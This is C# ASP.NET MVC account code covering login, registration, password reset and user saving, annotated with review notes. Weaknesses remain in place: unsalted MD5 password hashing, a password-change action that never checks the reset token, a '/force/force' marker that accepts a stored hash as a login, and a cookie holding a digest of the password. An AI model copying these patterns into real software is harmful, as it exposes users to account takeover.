/// <summary>
/// Handles the password prompt for a password-protected action: hashes the
/// posted password, compares it with the hash stored on the user's pending
/// action and, on a match, sends the user on to that action.
/// </summary>
/// <param name="form">Posted form; only the "password" field is read.</param>
/// <returns>
/// A redirect to the controller/action the user was trying to reach when the
/// password matches; otherwise a redirect back to the current URL.
/// </returns>
public ActionResult needPassword(FormCollection form)
{
    BaseUser user = Helper.GetUser(db);
    BaseUserAction action = user.getOneBaseUserAction(user.tryAction, user.tryController);

    // Nothing pending for this user: show the current page again.
    if (action == null)
    {
        return Redirect(URLHelper.getCurrentUrl(this.ControllerContext));
    }

    // No password posted yet: same outcome as above.
    string submitted = form["password"];
    if (submitted == null)
    {
        return Redirect(URLHelper.getCurrentUrl(this.ControllerContext));
    }

    // NOTE(review): judging by the helper's name the stored value is a plain MD5
    // digest, which is weak for password storage, and no attempt limit is visible
    // in this method. Confirm, and consider a salted KDF plus throttling.
    string submittedHash = Permission.CalculateMD5Hash(submitted);
    bool matches = string.Equals(action.password.ToUpper(), submittedHash);
    if (!matches)
    {
        GlobalsViewBag.Add("error", "Contraseña Incorrecta.");
        return Redirect(URLHelper.getCurrentUrl(this.ControllerContext));
    }

    // Password accepted: update the stored row for this user/action pair
    // before redirecting to the protected action.
    BaseUserAction grant = db.BaseUserActions.FirstOrDefault(d => d.actionID == action.actionID && d.userID == user.ID);
    if (grant != null)
    {
        grant.leftSeconds = 1;
        db.SaveChanges();
    }

    return Redirect(URLHelper.getUrl(user.tryController, user.tryAction));
}
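/// <summary>
/// Creates or updates the per-user settings of one action (password, password
/// protection flag, validity) from the posted form.
/// </summary>
/// <param name="form">
/// Posted form. Reads "id", "userid", "forever", "passwordAccess", "password",
/// "untilDate" and, for new rows only, "leftSeconds".
/// </param>
/// <returns>
/// JSON "Ok" when no exception occurred (including when the action id is
/// unknown), otherwise an object whose Message property carries the error text.
/// </returns>
public JsonResult actionsProperties(FormCollection form)
{
    // NOTE(review): the target user id comes straight from the request and
    // nothing in this method checks that the caller may change that user's
    // permissions. Confirm an authorization filter covers this action.
    try
    {
        int idaction = int.Parse(form["id"]);
        int user = int.Parse(form["userid"]);

        var actiondata = db.BaseActions.Find(idaction);
        if (actiondata != null)
        {
            // Only the first value of each comma-separated field is used.
            var foreverRaw = form["forever"].Split(',')[0];
            var passwordAccessRaw = form["passwordAccess"].Split(',')[0];
            bool forever = Convert.ToBoolean(foreverRaw);

            var existing = db.BaseUserActions.FirstOrDefault(x => x.userID == user && x.actionID == actiondata.id);
            if (existing != null)
            {
                // When the form posts the placeholder value the stored hash is kept.
                // The entity loaded above already holds this user's hash, so it is
                // simply left untouched. The earlier string-built SELECT filtered on
                // actionID only and could copy another user's hash into this row.
                if (form["password"].ToString() != Permission.defaultShowPassword)
                {
                    // NOTE(review): the helper's name indicates plain MD5; see if a
                    // salted KDF can replace it.
                    existing.password = Permission.CalculateMD5Hash(form["password"]);
                }

                existing.forever = forever;
                existing.passwordAccess = Convert.ToBoolean(passwordAccessRaw);
                existing.untilDate = Convert.ToDateTime(form["untilDate"]);
                // leftSeconds is not changed on an existing row.
            }
            else
            {
                BaseUserAction created = new BaseUserAction();
                created.forever = forever;
                created.password = Permission.CalculateMD5Hash(form["password"]);
                created.passwordAccess = Convert.ToBoolean(passwordAccessRaw);
                created.untilDate = Convert.ToDateTime(form["untilDate"]);
                created.leftSeconds = int.Parse(form["leftSeconds"]);
                created.actionID = actiondata.id;
                created.userID = user;
                db.BaseUserActions.Add(created);
            }

            db.SaveChanges();
        }

        return Json("Ok");
    }
    catch (Exception ex)
    {
        // NOTE(review): the raw exception text is returned to the client and the
        // response is allowed over GET. Consider logging server-side and
        // returning a generic message.
        return Json(new { Message = "Error " + ex.Message }, JsonRequestBehavior.AllowGet);
    }
}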
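/// <summary>
/// Signs a user in through WebSecurity, optionally drops a 30-day
/// "userLoginCookieERP" cookie, and redirects to the user's landing page.
/// </summary>
/// <param name="model">Posted credentials and the RememberMe flag.</param>
/// <param name="returnUrl">
/// Only tested for presence: when non-empty the user goes to BaseHome/Index.
/// It is never used as a redirect target.
/// </param>
/// <param name="form">Posted form; "RememberMe2" == "on" requests the extra cookie.</param>
/// <returns>A redirect to the landing page on success, or back to Account/Login on failure.</returns>
public ActionResult Login(LoginModel model, string returnUrl, FormCollection form)
{
    if (ModelState.IsValid && WebSecurity.Login(model.username, model.password, persistCookie: model.RememberMe))
    {
        // The sign-in can succeed for a login that has no BaseUsers row, so the
        // lookup result is checked before it is dereferenced.
        BaseUser user = db.BaseUsers.FirstOrDefault(usr => usr.username == model.username);
        if (user != null)
        {
            user.superAdminShowHiddenMenu = false;
            db.Entry(user).State = EntityState.Modified;
            db.SaveChanges();
        }

        // Create the remember-me cookie, unless the browser already sent one.
        if (form["RememberMe2"] == "on" && Request.Cookies["userLoginCookieERP"] == null)
        {
            // NOTE(review): the cookie carries a digest of "username:password"
            // for 30 days without HttpOnly/Secure set. An unsalted digest of the
            // password can be attacked offline if the cookie leaks; prefer a
            // random server-side token, and set HttpOnly/Secure if no client
            // script needs to read this cookie.
            string userPass = model.username + ":" + model.password;
            HttpCookie cookie = new HttpCookie("userLoginCookieERP");
            cookie.Value = model.username + "¬" + Permission.CalculateMD5Hash(userPass);
            cookie.Expires = DateTime.Now.AddDays(30);
            ControllerContext.HttpContext.Response.Cookies.Add(cookie);
        }

        if (!string.IsNullOrEmpty(returnUrl))
        {
            return RedirectToAction("Index", "BaseHome");
        }

        if (user != null)
        {
            if (user.BaseProfiles.Count > 0)
            {
                var firstProfile = user.BaseProfiles.First();
                if (firstProfile.BaseAction != null)
                {
                    return Redirect(URLHelper.getActionUrl(firstProfile.BaseAction));
                }
            }
            else if (user.BaseAction != null)
            {
                // The original tested "== null" around a "!= null" check, which
                // made this redirect unreachable.
                return Redirect(URLHelper.getActionUrl(user.BaseAction));
            }
        }

        return RedirectToAction("Index", "BaseHome");
    }

    // If we got this far, something failed; go back to the login form.
    ModelState.AddModelError("", ("The user name or password are invalid."));
    return RedirectToAction("Login", "Account", new { i = true, email = model.username });
}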
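/// <summary>
/// Signs in a BaseAccounts client by e-mail and password and reports the
/// outcome as JSON.
/// </summary>
/// <param name="model">Posted e-mail and password.</param>
/// <returns>
/// An object with status "success" or "error" and a message. An exception is
/// reported as status "error" with the exception text.
/// </returns>
public JsonResult OnLogin(Register model)
{
    try
    {
        // NOTE(review): the helper's name indicates a plain MD5 digest, which is
        // weak for password storage. No attempt throttling is visible here.
        var password = Permission.CalculateMD5Hash(model.password);
        var user = db.BaseAccounts.FirstOrDefault(d => d.email == model.email && d.password == password);
        if (user == null)
        {
            return Json(new { status = "error", message = "Username or password are incorrect." });
        }

        // The sign-in result used to be ignored, so a refused login was still
        // reported as success.
        if (!WebSecurity.Login(model.email, model.password, persistCookie: false))
        {
            return Json(new { status = "error", message = "Username or password are incorrect." });
        }

        // NOTE(review): this text looks copied from the registration response;
        // kept unchanged in case a client depends on it.
        return Json(new { status = "success", message = "Your account has been registered, check your mail for next steps" });
    }
    catch (Exception ex)
    {
        // NOTE(review): returns the raw exception text to the client; consider
        // logging it and sending a generic message instead.
        return Json(new { status = "error", message = ex.Message });
    }
}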
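/// <summary>
/// Registers a new, not yet confirmed BaseAccount and e-mails a validation
/// link that contains the account token.
/// </summary>
/// <param name="model">Posted registration data (e-mail, username, full name, phone, password).</param>
/// <returns>
/// An object with status "success" or "error" and a message. An exception is
/// reported as status "error" with the exception text.
/// </returns>
public JsonResult OnRegister(Register model)
{
    try
    {
        if (!ModelState.IsValid)
        {
            return Json(new { status = "error", message = "Captcha is invalid!." });
        }
        else if (db.BaseAccounts.Any(d => d.email == model.email))
        {
            return Json(new { status = "error", message = "This user already exists" });
        }
        else if (db.BaseAccounts.Any(d => d.username == model.username))
        {
            return Json(new { status = "error", message = "This username already exists" });
        }

        BaseAccount account = new BaseAccount();
        account.email = model.email;
        account.fullName = model.fullName;
        account.phone = model.phone;
        account.username = model.username;
        account.registered = false;
        account.creationDate = DateTime.Now;
        // NOTE(review): the helper's name indicates plain MD5; prefer a salted KDF.
        account.password = Permission.CalculateMD5Hash(model.password);

        // The validation token was a digest of the creation time plus the e-mail,
        // both guessable. Use 16 random bytes instead, written as 32 hex
        // characters (the length of an MD5 hex digest).
        // Presumably the token is checked by looking up the stored value; confirm.
        byte[] tokenBytes = new byte[16];
        using (var rng = System.Security.Cryptography.RandomNumberGenerator.Create())
        {
            rng.GetBytes(tokenBytes);
        }
        account.token = BitConverter.ToString(tokenBytes).Replace("-", "");

        db.BaseAccounts.Add(account);
        db.SaveChanges();

        SendMail mail = new SendMail();
        mail.To.Add(model.email);
        BaseEmail text = db.BaseEmails.FirstOrDefault(d => d.code == "Register");

        Dictionary<string, string> vars = new Dictionary<string, string>();
        // The name is user input placed into an HTML body, so it is encoded.
        vars.Add("@fullname@", System.Net.WebUtility.HtmlEncode(model.fullName));
        var url = URLHelper.getAbsoluteUrlNoHome("BaseService", "ValidateAccount", new string[] { $"token={account.token}" });
        vars.Add("@link@", $"<a href={url}>here</a>");

        mail.Body = Helper.ReplaceDictionary(text.bodyHTML, vars);
        mail.Subject = text.subject;
        mail.Send();

        return Json(new { status = "success", message = "Your account has been registered, check your mail for next steps" });
    }
    catch (Exception ex)
    {
        // NOTE(review): returns the raw exception text to the client; consider
        // logging it and sending a generic message instead.
        return Json(new { status = "error", message = ex.Message });
    }
}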
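/// <summary>
/// Starts the forgot-password flow: for a matching BaseUser and/or a
/// registered BaseAccount, stores a fresh token and e-mails a link to
/// Account/ChangePassword that carries it.
/// </summary>
/// <param name="model">Posted model; only <c>username</c> is read (user name or client e-mail).</param>
/// <param name="form">Not used.</param>
/// <returns>
/// Always the same success object, whether or not an account matched, so the
/// response does not reveal which logins exist.
/// </returns>
public JsonResult Forgot(LoginModel model, FormCollection form)
{
    BaseUser user = db.BaseUsers.FirstOrDefault(usr => usr.username == model.username);
    if (user != null && (user.BaseUserStatu.canLogin || user.userStatusID == 4))
    {
        // Status 4 is set here and reset to 1 by ChangePassword.
        // Presumably it marks "password reset pending"; confirm.
        user.userStatusID = 4;
        user.token = CreateForgotPasswordToken();

        SendMail mail = new SendMail();
        string link = $"<a href='{ URLHelper.getAbsoluteUrlNoHome("Account", "ChangePassword", $"token={user.token}")}'>here</a>";
        mail.Body = Helper.BaseMessage("Email - Forgot password instructions Body").Replace("@user@", user.FullName).Replace("@link@", link);
        mail.Subject = Helper.BaseMessage("Email - Forgot password instructions Subject").Replace("@company@", new BaseConfiguration().appName);
        mail.To.Add(user.username);
        mail.Send();
        db.SaveChanges();
    }

    BaseAccount client = db.BaseAccounts.FirstOrDefault(usr => usr.email == model.username);
    if (client != null && client.registered)
    {
        client.token = CreateForgotPasswordToken();

        SendMail mail = new SendMail();
        string link = $"<a href='{ URLHelper.getAbsoluteUrlNoHome("Account", "ChangePassword", $"token={client.token}")}'>here</a>";
        mail.Body = Helper.BaseMessage("Email - Forgot password instructions Body").Replace("@user@", client.fullName).Replace("@link@", link);
        mail.Subject = Helper.BaseMessage("Email - Forgot password instructions Subject").Replace("@company@", new BaseConfiguration().appName);
        mail.To.Add(client.email);
        mail.Send();
        db.SaveChanges();
    }

    return Json(new { status = "success", message = "Instructions have been sent." });
}

/// <summary>
/// Returns a reset token made of 16 random bytes written as 32 hex characters
/// (the length of an MD5 hex digest).
/// </summary>
/// <remarks>
/// Replaces a token that was a digest of the login name plus the stored
/// password hash, which was identical on every request and could be
/// recomputed by anyone who knew the hash.
/// NOTE(review): assumes the token is checked by looking up the stored value,
/// and no expiry is recorded with it. Confirm both.
/// </remarks>
private static string CreateForgotPasswordToken()
{
    byte[] tokenBytes = new byte[16];
    using (var rng = System.Security.Cryptography.RandomNumberGenerator.Create())
    {
        rng.GetBytes(tokenBytes);
    }
    return BitConverter.ToString(tokenBytes).Replace("-", "");
}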
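/// <summary>
/// Sets a new password for the BaseUser or, failing that, the BaseAccount
/// whose key equals <c>model.ID</c>, replaces its token and e-mails a
/// confirmation.
/// </summary>
/// <param name="model">Posted model; <c>ID</c> and <c>password</c> are read.</param>
/// <returns>
/// A redirect to Account/Login after a user change or when nothing matched,
/// or to Send/Index after a client change.
/// </returns>
/// <remarks>
/// NOTE(review): the record is selected by the posted ID alone. Nothing in
/// this method checks the reset token (or that a reset was requested), so
/// whoever can post to this action chooses whose password changes. Verify the
/// token server-side here, e.g. require the posted token to equal the stored
/// one, and confirm that the form posts it.
/// NOTE(review): users and clients are looked up with the same ID and users
/// are tried first, so a client whose ID also exists in BaseUsers would change
/// that user's password. Selecting by token would resolve this as well.
/// </remarks>
public ActionResult ChangePassword(BaseUser model)
{
    // The token stored after the change was a digest of the current time, which
    // is guessable. Use 16 random bytes instead, written as 32 hex characters
    // (the length of an MD5 hex digest). Overwriting the token presumably
    // retires the e-mailed link; confirm.
    byte[] tokenBytes = new byte[16];
    using (var rng = System.Security.Cryptography.RandomNumberGenerator.Create())
    {
        rng.GetBytes(tokenBytes);
    }
    string replacementToken = BitConverter.ToString(tokenBytes).Replace("-", "");

    BaseUser user = db.BaseUsers.Find(model.ID);
    if (user != null)
    {
        BaseConfiguration config = new BaseConfiguration();
        // NOTE(review): the helper's name indicates plain MD5; prefer a salted KDF.
        user.password = Permission.CalculateMD5Hash(model.password);
        user.userStatusID = 1;
        user.token = replacementToken;

        SendMail mail = new SendMail();
        string link = $"<a href='{ URLHelper.getAbsoluteUrlNoHome("Account", "Login")}'>{config.appName}</a>";
        mail.Body = Helper.BaseMessage("Email - Forgot password confirmation Body").Replace("@user@", user.FullName).Replace("@link@", link);
        mail.Subject = Helper.BaseMessage("Email - Forgot password confirmation Subject").Replace("@appName@", config.appName);
        mail.To.Add(user.username);
        mail.Send();
        db.SaveChanges();
        return RedirectToAction("Login", "Account");
    }

    BaseAccount client = db.BaseAccounts.Find(model.ID);
    if (client != null)
    {
        BaseConfiguration config = new BaseConfiguration();
        client.password = Permission.CalculateMD5Hash(model.password);
        client.token = replacementToken;

        SendMail mail = new SendMail();
        string link = $"<a href='{ URLHelper.getAbsoluteUrlNoHome("Account", "Login")}'>{config.appName}</a>";
        mail.Body = Helper.BaseMessage("Email - Forgot password confirmation Body").Replace("@user@", client.fullName).Replace("@link@", link);
        mail.Subject = Helper.BaseMessage("Email - Forgot password confirmation Subject").Replace("@appName@", config.appName);
        mail.To.Add(client.email);
        mail.Send();
        db.SaveChanges();
        return RedirectToAction("Index", "Send");
    }

    return RedirectToAction("Login", "Account");
}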
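/// <summary>
/// Creates (ID == 0) or updates (ID != 0) a BaseUser from the posted model,
/// running the model's Before*/After* hooks around each step and storing an
/// uploaded profile image as "&lt;ID&gt;.png".
/// </summary>
/// <param name="model">Posted user. The whole object is bound from the request.</param>
/// <param name="form">Posted form; reads "imgActual", "employeeType" and "office".</param>
/// <param name="multiUser">When true, runs the "DuplicateUser" command after saving.</param>
/// <returns>
/// The user's ID as JSON, or an object with a Message property when a hook
/// rejects the operation or the user to edit does not exist.
/// </returns>
/// <remarks>
/// NOTE(review): the entity is bound directly from the request and marked
/// Modified as a whole, so every bindable property can be set by the caller
/// (over-posting). Bind to a view model or an explicit property list if some
/// fields must not be editable here.
/// NOTE(review): no permission check on the edited ID is visible in this
/// method. Confirm it is enforced by a filter or by the hooks.
/// </remarks>
public JsonResult Save(BaseUser model, FormCollection form, bool multiUser = false)
{
    BoolString validation = model.BeforeSave(db);
    if (validation.BoolValue)
    {
        return Json(new { Message = validation.StringValue });
    }

    if (model.ID != 0)
    {
        validation = model.BeforeEdit(db);
        if (validation.BoolValue)
        {
            return Json(new { Message = validation.StringValue });
        }

        if (ModelState.IsValid)
        {
            // Read the stored login name and hash with a projection instead of
            // string-built SQL. A projection loads no tracked entity, so it does
            // not conflict with attaching the posted model below.
            var userId = model.ID;
            var stored = db.BaseUsers
                .Where(u => u.ID == userId)
                .Select(u => new { u.username, u.password })
                .FirstOrDefault();
            if (stored == null)
            {
                return Json(new { Message = "User not found." });
            }

            // A changed login name ends the current session after a successful save.
            bool logout = model.username != (stored.username ?? string.Empty);

            if (model.password == Permission.defaultShowPassword)
            {
                // The placeholder was posted: keep the stored hash.
                model.password = stored.password ?? string.Empty;
            }
            else
            {
                // NOTE(review): the helper's name indicates plain MD5; prefer a salted KDF.
                model.password = Permission.CalculateMD5Hash(model.password);
            }

            SaveUploadedUserImage(model);
            if (model.imageUrl == null)
            {
                // NOTE(review): "imgActual" is stored exactly as posted. Validate
                // it if it is later used as a path or written into HTML.
                model.imageUrl = string.IsNullOrEmpty(form["imgActual"]) ? "" : form["imgActual"];
            }

            db.Entry(model).State = EntityState.Modified;
            if (db.SaveChanges() != 0 && logout)
            {
                WebSecurity.Logout();
            }
        }

        validation = model.AfterEdit(db);
        if (validation.BoolValue)
        {
            return Json(new { Message = validation.StringValue });
        }
    }
    else
    {
        if (form["employeeType"] != null)
        {
            model.employeeType_Type = int.Parse(form["employeeType"].Split(',')[0]);
        }
        if (form["office"] != null)
        {
            model.office_office = int.Parse(form["office"].Split(',')[0]);
        }

        validation = model.BeforeCreate(db);
        if (validation.BoolValue)
        {
            return Json(new { Message = validation.StringValue });
        }

        model.password = Permission.CalculateMD5Hash(model.password);
        db.BaseUsers.Add(model);
        db.SaveChanges();

        // The image is stored only after the insert. Before it, model.ID is
        // still 0, so every new user's picture was written to "0.png".
        // Assumes the key is assigned by the insert; confirm.
        if (SaveUploadedUserImage(model))
        {
            db.SaveChanges();
        }

        validation = model.AfterCreate(db);
        if (validation.BoolValue)
        {
            return Json(new { Message = validation.StringValue });
        }
    }

    validation = model.AfterSave(db);
    if (validation.BoolValue)
    {
        return Json(new { Message = validation.StringValue });
    }

    if (multiUser)
    {
        Helper.executeNonQUery("DuplicateUser", db);
    }

    db.SaveChanges();
    return Json(model.ID);
}

/// <summary>
/// Stores the posted "imageUrl" file, if any, as "&lt;ID&gt;.png" under
/// ~/Uploads/UserImages/ and records that name on the model.
/// </summary>
/// <param name="model">User whose ID names the file and whose imageUrl is set.</param>
/// <returns>True when a file was stored.</returns>
/// <remarks>
/// The file name is built on the server, so the client-supplied name is never
/// used in the path.
/// NOTE(review): the content is not checked to be an image before it is
/// written under a ".png" name; consider validating it and limiting its size.
/// </remarks>
private bool SaveUploadedUserImage(BaseUser model)
{
    if (Request.Files.Count == 0)
    {
        return false;
    }

    var file = Request.Files["imageUrl"];
    if (file == null || file.ContentLength <= 0)
    {
        return false;
    }

    string filename = model.ID + ".png";
    string filePath = Path.Combine(HttpContext.Server.MapPath("~/Uploads/UserImages/"), filename);
    file.SaveAs(filePath);
    model.imageUrl = filename;
    return true;
}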
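/// <summary>
/// Validates a login against BaseAccounts (by e-mail, case-insensitive) and
/// then BaseUsers (by username) and, on a match, issues a non-persistent forms
/// authentication cookie.
/// </summary>
/// <param name="login">Client e-mail or user name.</param>
/// <param name="password">
/// Clear-text password. If it contains the marker "/force/force", the marker
/// is removed and the remainder is compared with the stored value without
/// hashing.
/// </param>
/// <returns>True when a matching client or user was found; otherwise false.</returns>
/// <remarks>
/// No shared or master password is accepted: a login succeeds only with the
/// account's own stored credential.
/// NOTE(review): with the "/force/force" marker, knowing the stored hash is
/// enough to sign in. Presumably this serves a cookie-based re-login; confirm,
/// and replace it with a random server-side token.
/// NOTE(review): the helper's name indicates plain MD5; prefer a salted KDF.
/// </remarks>
public override bool ValidateUser(string login, string password)
{
    // Missing credentials can never match; answer false instead of throwing.
    if (login == null || password == null)
    {
        return false;
    }

    string truePassword = password.Contains("/force/force")
        ? password.Replace("/force/force", "")
        : Permission.CalculateMD5Hash(password);

    var client = db.BaseAccounts.FirstOrDefault(d => d.email.ToLower() == login.ToLower() && d.password == truePassword);
    if (client != null)
    {
        FormsAuthentication.SetAuthCookie(client.email, false);
        return true;
    }

    var user = db.BaseUsers.FirstOrDefault(d => (d.username == login) && d.password == truePassword);
    if (user != null)
    {
        FormsAuthentication.SetAuthCookie(user.username, false);
        return true;
    }

    return false;
}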